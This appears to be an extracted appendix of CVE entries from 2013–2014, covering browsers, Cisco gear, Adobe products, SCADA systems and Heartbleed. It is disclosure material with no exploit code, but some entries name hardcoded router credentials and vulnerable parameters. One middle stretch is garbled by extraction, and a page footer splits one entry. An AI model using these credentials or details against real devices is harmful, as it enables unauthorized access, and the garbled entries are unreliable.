CVE-2013-0746 | Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 do not properly implement quickstubs that use the jsval data type for their return values, which allows remote attackers to execute arbitrary code or cause a denial of service (compartment mismatch and application crash) via crafted JavaScript code that is not properly handled during garbage collection.

CVE-2013-0753 | Use-after-free vulnerability in the serializeToStream implementation in the XMLSerializer component in Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 allows remote attackers to execute arbitrary code via crafted web content.

CVE-2013-0787 | Use-after-free vulnerability in the nsEditor::IsPreformatted function in editor/libeditor/base/nsEditor.cpp in Mozilla Firefox before 19.0.2, Firefox ESR 17.x before 17.0.4, Thunderbird before 17.0.4, Thunderbird ESR 17.x before 17.0.4, and SeaMonkey before 2.16.1 allows remote attackers to execute arbitrary code via vectors involving an execCommand call.

CVE-2013-0909 | The XSS Auditor in Google Chrome before 25.0.1364.152 allows remote attackers to obtain sensitive HTTP Referer information via unspecified vectors.

CVE-2013-1035 | The iTunes ActiveX control in Apple iTunes before 11.1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.

CVE-2013-1102 | The Wireless Intrusion Prevention System (wIPS) component on Cisco Wireless LAN Controller (WLC) devices with software 7.0 before 7.0.235.0, 7.1, 7.2 before 7.2.110.0, and 7.3 before 7.3.101.0 allows remote attackers to cause a denial of service (device reload) via crafted IP packets, aka Bug ID CSCtx80743.

CVE-2013-1140 | The XML parser in Cisco Security Monitoring, Analysis, and Response System (MARS) allows remote attackers to read arbitrary files via an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, aka Bug ID CSCue55093.

CVE-2013-1144 | Memory leak in the IKEv1 implementation in Cisco IOS 15.1 allows remote attackers to cause a denial of service (memory consumption) via unspecified (1) IPv4 or (2) IPv6 IKE packets, aka Bug ID CSCth81055.

CVE-2013-1153 | Cross-site request forgery (CSRF) vulnerability in the web interface in Cisco Prime Infrastructure allows remote attackers to hijack the authentication of arbitrary users, aka Bug ID CSCue84676.

CVE-2013-1181 | Cisco NX-OS on Nexus 5500 devices 4.x and 5.x before 5.0(3)N2(2), Nexus 3000 devices 5.x before 5.0(3)U3(2), and Unified Computing System (UCS) 6200 devices before 2.0(1w) allows remote attackers to cause a denial of service (device reload) by sending a jumbo packet to the management interface, aka Bug IDs CSCtx17544, CSCts10593, and CSCtx95389.

CVE-2013-1303 | Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability", a different vulnerability than CVE-2013-1304 and CVE-2013-1338.

CVE-2013-1384 | Adobe Shockwave Player before 12.0.2.122 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-1386.

CVE-2013-1388 | Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 10, 9.0.1 before Update 9, 9.0.2 before Update 4, and 10 before Update 9 allows attackers to obtain administrator-console access via unknown vectors.

CVE-2013-1450 | Microsoft Internet Explorer 8 and 9, when the Proxy Settings configuration has the same Proxy address and Port values in the HTTP and Secure rows, does not properly reuse TCP sessions to the proxy server, which allows remote attackers to obtain sensitive information intended for a specific host via a crafted HTML document that triggers many HTTPS requests and then triggers an HTTP request to that host, as demonstrated by reading a Cookie header, aka MSRC 12096gd.

CVE-2013-1472 | Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than other CVEs listed in the February 2013 CPU.

CVE-2013-1553 | Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 11.1.1.6.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Web Services Security.

CVE-2013-1620 | The TLS implementation in Mozilla Network Security Services (NSS) does not properly consider timing side-channel attacks on a noncompliant MAC check operation during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, a related issue to CVE-2013-0169.

CVE-2013-1627 | Absolute path traversal vulnerability in NTWebServer.exe in Indusoft Studio 7.0 and earlier and Advantech Studio 7.0 and earlier allows remote attackers to read arbitrary files via a full pathname in an argument to the sub_401A90 CreateFileW function.

CVE-2013-1638 | Opera before 12.13 allows remote attackers to execute arbitrary code via crafted clipPaths in an SVG document.

CVE-2013-1669 | Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 21.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2013-1676 | The SelectionIterator::GetNextSegment function in Mozilla Firefox before 21.0, Firefox ESR 17.x before 17.0.6, Thunderbird before 17.0.6, and Thunderbird ESR 17.x before 17.0.6 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds read) via unspecified vectors.

CVE-2013-1700 | The Mozilla Maintenance Service in Mozilla Firefox before 22.0 on Windows does not properly handle inability to launch the Mozilla Updater executable file, which allows local users to gain privileges via vectors involving placement of a Trojan horse executable file at an arbitrary location.

CVE-2013-1734 | Cross-site request forgery (CSRF) vulnerability in attachment.cgi in Bugzilla 2.x, 3.x, and 4.0.x before 4.0.11; 4.1.x and 4.2.x before 4.2.7; and 4.3.x and 4.4.x before 4.4.1 allows remote attackers to hijack the authentication of arbitrary users for requests that commit an attachment change via an update action.

CVE-2013-1777 | The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not properly implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.

CVE-2013-2319 | FileMaker Pro before 12 and Pro Advanced before 12 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-2340 | Unspecified vulnerability on the HP ProCurve JCA, JCB, JDA, JDB, JEA, JFA, JFB, JFC, JGA, 658250-B21, and 658247-B21, HP 3COM routers and switches, and HP H3C routers and switches allows remote attackers to execute arbitrary code or obtain sensitive information via unknown vectors.

CVE-2013-2350 | Unspecified vulnerability in HP Storage Data Protector 6.2X allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors, aka ZDI-CAN-1897.

CVE-2013-2492 | Stack-based buffer overflow in Firebird 2.1.3 through 2.1.5 before 18514, and 2.5.1 through 2.5.3 before 26623, on Windows allows remote attackers to execute arbitrary code via a crafted packet to TCP port 3050, related to a missing size check during extraction of a group number from CNCT information.

CVE-2013-2507 | Multiple cross-site scripting (XSS) vulnerabilities in the Brother MFC-9970CDW printer with firmware G (1.03) allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to admin/log_to_net.html or (2) kind parameter to fax/copy_settings.html, a different vulnerability than CVE-2013-2670 and CVE-2013-2671.

CVE-2013-2736 | Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2718, CVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2732, CVE-2013-2734, CVE-2013-2735, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, and CVE-2013-3341.

CVE-2013-2780 | Siemens SIMATIC S7-1200 PLCs 2.x and 3.x allow remote attackers to cause a denial of service (defect-mode transition and control outage) via crafted packets to UDP port 161 (aka the SNMP port).

CVE-2013-2803 | ProSoft RadioLinx ControlScape before 6.00.040 uses a deficient PRNG algorithm and seeding strategy for passphrases, which makes it easier for remote attackers to obtain access via a brute-force attack.

CVE-2013-2824 | Schneider Electric StruxureWare SCADA Expert Vijeo Citect 7.40, Vijeo Citect 7.20 through 7.30SP1, CitectSCADA 7.20 through 7.30SP1, StruxureWare PowerSCADA Expert 7.30 through 7.30SR1, and PowerLogic SCADA 7.20 through 7.20SR1 do not properly handle exceptions, which allows remote attackers to cause a denial of service via a crafted packet.

CVE-2013-2826 | WellinTech KingSCADA before 3.1.2, KingAlarm&Event before 3.1, and KingGraphic before 3.1.2 perform authentication on the KAEClientManager console rather than on the server, which allows remote attackers to bypass intended access restrictions and discover credentials via a crafted packet to TCP port 8130.

CVE-2013-2920 | The DoResolveRelativeHost function in url/url_canon_relative.cc in Google Chrome before 30.0.1599.66 allows remote attackers to cause a denial of service (out-of-bounds read) via a relative URL containing a hostname, as demonstrated by a protocol-relative URL beginning with a www.google.com substring.

CVE-2013-3064 | Open redirect vulnerability in ui/dynamic/unsecured.html in Linksys EA6500 with firmware 1.1.28.147876 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the target parameter.

CVE-2013-3116 | Microsoft Internet Explorer 7 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2013-3137 | Microsoft FrontPage 2003 SP3 does not properly parse DTDs, which allows remote attackers to obtain sensitive information via crafted XML data in a FrontPage document, aka "XML Disclosure Vulnerability".

CVE-2013-3194 | Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2013-3199 | Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2013-3201 | Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2013-3203, CVE-2013-3206, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3206 | Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2013-3201, CVE-2013-3203, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3280 | EMC RSA Authentication Agent 7.1.x before 7.1.2 for Web for Internet Information Services has a fail-open design, which allows remote attackers to bypass intended access restrictions via vectors that trigger an agent crash.

CVE-2013-3387 | Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance 8.6 and 9.x before 9.2(1) allows remote attackers to cause a denial of service (disk consumption) via a flood of TCP packets to port 5400, leading to large error-log files, aka Bug ID CSCua42724.

CVE-2013-3417 | The administrative web interface in Cisco Video Surveillance Operations Manager does not properly perform authentication, which allows remote attackers to watch video feeds via a crafted URL, aka Bug ID CSCtg72262.

CVE-2013-3632 | The Cron service in rpc.php in OpenMediaVault allows remote authenticated users to execute cron jobs as arbitrary users and execute arbitrary commands via the username parameter.

CVE-2013-3656 | Cybozu Office 9.1.0 and earlier does not properly manage sessions, which allows remote attackers to bypass authentication by leveraging knowledge of a login URL.

CVE-2013-3856 | Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability".

CVE-2013-3860 | Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 does not properly parse a DTD during XML digital-signature validation, which allows remote attackers to cause a denial of service (application crash or hang) via a crafted signed XML document, aka "Entity Expansion Vulnerability".

CVE-2013-3893 | Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help: URL that triggers loading of hxds.dll.

CVE-2013-3897 | Use-after-free vulnerability in the CDisplayPointer class in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted JavaScript code that uses the onpropertychange event handler, as exploited in the wild in September and October 2013, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2013-3900 | The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not properly validate PE file digests during Authenticode signature verification, which allows remote attackers to execute arbitrary code via a crafted PE file, aka "WinVerifyTrust Signature Validation Vulnerability".

CVE-2013-3905 | Microsoft Outlook 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT does not properly expand metadata contained in S/MIME certificates, which allows remote attackers to obtain sensitive network configuration and state information via a crafted certificate in an e-mail message, aka "S/MIME AIA Vulnerability".

CVE-2013-4223 | The Gentoo Nullmailer package before 1.11-r2 uses world-readable permissions for /etc/nullmailer/remotes, which allows local users to obtain SMTP authentication credentials by reading the file.

CVE-2013-4436 | The default configuration for salt-ssh in Salt (aka SaltStack) 0.17.0 does not validate the SSH host key of requests, which allows remote attackers to have unspecified impact via a man-in-the-middle (MITM) attack.

CVE-2013-4478 | Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the filename of an email attachment.

CVE-2013-4529 | Buffer overflow in hw/pci/pcie_aer.c in QEMU before 1.7.2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large log_num value in a savevm image.

CVE-2013-4555 | Cross-site request forgery (CSRF) vulnerability in ecrire/action/logout.php in SPIP before 2.1.24 allows remote attackers to hijack the authentication of arbitrary users for requests that logout the user via unspecified vectors.

CVE-2013-4776 | NETGEAR ProSafe GS724Tv3 and GS716Tv2 with firmware 5.4.1.13 and earlier, GS748Tv4 5.4.1.14, and GS510TP 5.0.4.4 allows remote attackers to cause a denial of service (reboot or crash) via a crafted HTTP request to filesystem.

CVE-2013-4782 | The Supermicro BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.

CVE-2013-5057 | hxds.dll in Microsoft Office 2007 SP3 and 2010 SP1 and SP2 does not implement the ASLR protection mechanism, which makes it easier for remote attackers to execute arbitrary code via a crafted COM component on a web site that is visited with Internet Explorer, as exploited in the wild in December 2013, aka "HXDS ASLR Vulnerability".

CVE-2013-5369 | IBM SPSS Analytical Decision Management 6.1 before IF1, 6.2 before IF1, and 7.0 before FP1 IF6 might allow remote attackers to execute arbitrary code by deploying and accessing a service.

CVE-2013-5428 | IBM WebSphere DataPower XC10 appliances 2.5.0 do not require authentication for all administrative actions, which allows remote attackers to cause a denial of service via unspecified vectors.

CVE-2013-5431 | Open redirect vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.

CVE-2013-5494 | Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco Unified MeetingPlace Solution, as used in Unified MeetingPlace Web Conferencing and Unified MeetingPlace, allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCui45209 and CSCui44674.

CVE-2013-5507 | The IPsec implementation in Cisco Adaptive Security Appliance (ASA) Software 9.1 before 9.1(1.7), when an IPsec VPN tunnel is enabled, allows remote attackers to cause a denial of service (device reload) via a (1) ICMP or (2) ICMPv6 packet that is improperly handled during decryption, aka Bug ID CSCue18975.

CVE-2013-5536 | Cisco Secure Access Control System (ACS) does not properly implement an incoming-packet firewall rule, which allows remote attackers to cause a denial of service (process crash) via a flood of crafted packets, aka Bug ID CSCui51521.

CVE-2013-5559 | Buffer overflow in the Active Template Library (ATL) framework in the VPNAPI COM module in Cisco AnyConnect Secure Mobility Client 2.x allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document, aka Bug ID CSCuj58139.

CVE-2013-5561 | The Safe Search enforcement feature in Cisco Adaptive Security Appliance (ASA) CX Context-Aware Security Software does not properly perform filtering, which allows remote attackers to bypass intended policy restrictions via unspecified vectors, aka Bug ID CSCui94622.

CVE-2013-5751 | Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors.

CVE-2013-5757 | Absolute path traversal vulnerability in Yealink VoIP Phone SIP-T38G allows remote authenticated users to read arbitrary files via a full pathname in the dumpConfigFile function in the command parameter to cgi-bin/cgiServer.exx.

CVE-2013-5828 | Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1, EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3, and EM Plugin for DB 12.1.0.2 and 12.1.0.3 allows remote attackers to affect integrity via unknown vectors related to Storage Management.

CVE-2013-6167 | Mozilla Firefox through 27 sends HTTP Cookie headers without first validating that they have the required character-set restrictions, which allows remote attackers to conduct the equivalent of a persistent Logout CSRF attack via a crafted parameter that forces a web application to set a malformed cookie within an HTTP response.

CVE-2013-6188 | Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) 7.1 through 7.2.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.

CVE-2013-6284 | Unspecified vulnerability in the Statutory Reporting for Insurance (FS SR) component in the Financial Services module for SAP ERP Central Component (ECC) allows attackers to execute arbitrary code via unspecified vectors, related to a "code injection vulnerability".

CVE-2013-6396 | The OpenStack Python client library for Swift (python-swiftclient) 1.0 through 1.9.0 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-6475 | Multiple integer overflows in (1) OPVPOutputDev.cxx and (2) oprs/OPVPSplash.cxx in the pdftoopvp filter in CUPS and cups-filters before 1.0.47 allow remote attackers to execute arbitrary code via a crafted PDF file, which triggers a heap-based buffer overflow.

CVE-2013-6660 | The drag-and-drop implementation in Google Chrome before 33.0.1750.117 does not properly restrict the information in WebDropData data structures, which allows remote attackers to discover full pathnames via a crafted web site.

CVE-2013-6699 | The Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation on Cisco Wireless LAN Controller (WLC) devices allows remote attackers to cause a denial of service via a crafted CAPWAP packet that triggers a buffer over-read, aka Bug ID CSCuh81880.

CVE-2013-6702 | The management implementation on Cisco ONS 15454 controller cards with software 9.8 and earlier allows remote attackers to cause a denial of service (card reset) via crafted packets, aka Bug ID CSCtz50902.

CVE-2013-6979 | The VTY authentication implementation in Cisco IOS XE 03.02.xx.SE and 03.03.xx.SE incorrectly relies on the Linux-IOS internal-network configuration, which allows remote attackers to bypass authentication by leveraging access to a 192.168.x.2 source IP address, aka Bug ID CSCuj90227.

CVE-2013-6994OpenText Exceed OnDemand (EoD) 8transmits the session ID in x000D cleartextwhich allows remote attackers to performsession fixation x000D attacks by sniffingthe network

CVE-2013-7004D-Link DSR-150 with firmware before108B44 DSR-150N with firmware before105B64 DSR-250 and DSR-250N withfirmware before 108B44 and DSR-500 DSR-500N DSR-1000 and DSR-1000N with firmware before 108B77have a hardcoded account of usernamegkJ9232xXyruTRmY which makes it easierfor remote attackers to obtain access byleveraging knowledge of the username

CVE-2013-7043Multiple cross-site request forgery (CSRF)vulnerabilities on Cisco x000D ScientificAtlanta DPR2320R2 routers with software202r1262-090417 x000D allow remoteattackers to hijack the authentication ofadministrators x000D for requests that(1) change a password via the Passwordparameter to x000D goformRgSecurity(2) reboot the device via the Restartparameter to x000D goformrestart (3)modify Wi-Fi settings as demonstratedby the x000D WpaPreSharedKeyparameter to goformwlanSecurity or(4) modify x000D parental controls viathe ParentalPassword parameter to x000DgoformRgParentalBasic

CVE-2013-7389Multiple cross-site scripting (XSS)vulnerabilities in D-Link DIR-645 Router(Rev A1) with firmware before 104B11allow remote attackers to inject arbitraryweb script or HTML via the (1) deviceidparameter to parentalcontrolsbindphp(2) RESULT parameter to infophp or (3)receiver parameter to bsc sms sendphp

CVE-2014-0001Buffer overflow in clientmysqlcc in Oracle

CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 22 of 28

MySQL and MariaDB before 5535 allowsremote database servers to cause a denialof service (crash) and possibly executearbitrary code via a long server versionstring

CVE-2014-0035: The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-0160: The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.

CVE-2014-0259: Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."

CVE-2014-0266: The XMLHTTP ActiveX controls in XML Core Services 3.0 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to bypass the Same Origin Policy via a web page that is visited in Internet Explorer, aka "MSXML Information Disclosure Vulnerability."

CVE-2014-0294: Microsoft Forefront Protection 2010 for Exchange Server does not properly parse e-mail content, which might allow remote attackers to execute arbitrary code via a crafted message, aka "RCE Vulnerability."

CVE-2014-0313: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-0321.

CVE-2014-0354: The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 1.00(BFQ.6)C0 has a hardcoded password of qweasdzxc for an unspecified account, which allows remote attackers to obtain index.asp login access via an HTTP request.

CVE-2014-0362: Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7.0.14.G.216 and 7.2 before 7.2.0.G.114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.

CVE-2014-0433: Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.

CVE-2014-0488: APT before 1.0.9 does not "invalidate repository data" when moving from an unauthenticated to authenticated state, which allows remote attackers to have unspecified impact via crafted repository data.

CVE-2014-0493: Adobe Reader and Acrobat 10.x before 10.1.9 and 11.x before 11.0.06 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0495.

CVE-2014-0494: Adobe Digital Editions 2.0.1 allows attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unspecified vectors.

CVE-2014-0498: Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.

CVE-2014-0515: Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.

CVE-2014-0533: Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.

CVE-2014-0536: Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.

CVE-2014-0562: Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.1.12 and 11.x before 11.0.09 on OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)."

CVE-2014-0577: Adobe Flash Player before 13.0.0.252 and 14.x and 15.x before 15.0.0.223 on Windows and OS X and before 11.2.202.418 on Linux, Adobe AIR before 15.0.0.356, Adobe AIR SDK before 15.0.0.356, and Adobe AIR SDK & Compiler before 15.0.0.356 allow attackers to execute arbitrary code by leveraging an unspecified "type confusion," a different vulnerability than CVE-2014-0584, CVE-2014-0585, CVE-2014-0586, and CVE-2014-0590.

CVE-2014-0765: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long GotoCmd argument.

CVE-2014-0767: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode argument.

CVE-2014-0783: Stack-based buffer overflow in BKHOdeq.exe in Yokogawa CENTUM CS 3000 R3.09.50 and earlier allows remote attackers to execute arbitrary code via a crafted TCP packet.

CVE-2014-1330: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1342: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1349: Use-after-free vulnerability in Safari in Apple iOS before 7.1.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an invalid URL.

CVE-2014-1356: Heap-based buffer overflow in launchd in Apple iOS before 7.1.2, Apple OS X before 10.9.4, and Apple TV before 6.1.2 allows attackers to execute arbitrary code via a crafted application that sends IPC messages.

CVE-2014-1370: The byte-swapping implementation in copyfile in Apple OS X before 10.9.4 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds memory access and application crash) via a crafted AppleDouble file in a ZIP archive.

CVE-2014-1379: Graphics Drivers in Apple OS X before 10.9.4 allows attackers to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a 32-bit executable file for a crafted application.

CVE-2014-1382: WebKit, as used in Apple iOS before 7.1.2, Apple Safari before 6.1.5 and 7.x before 7.0.5, and Apple TV before 6.1.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.

CVE-2014-1466: SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.

CVE-2014-1472: Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.

CVE-2014-1477: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1518: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1563: Use-after-free vulnerability in the mozilla::DOMSVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.

CVE-2014-1565: The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.

CVE-2014-1586: content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.

CVE-2014-1701: The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget::dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.

CVE-2014-1740: Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.

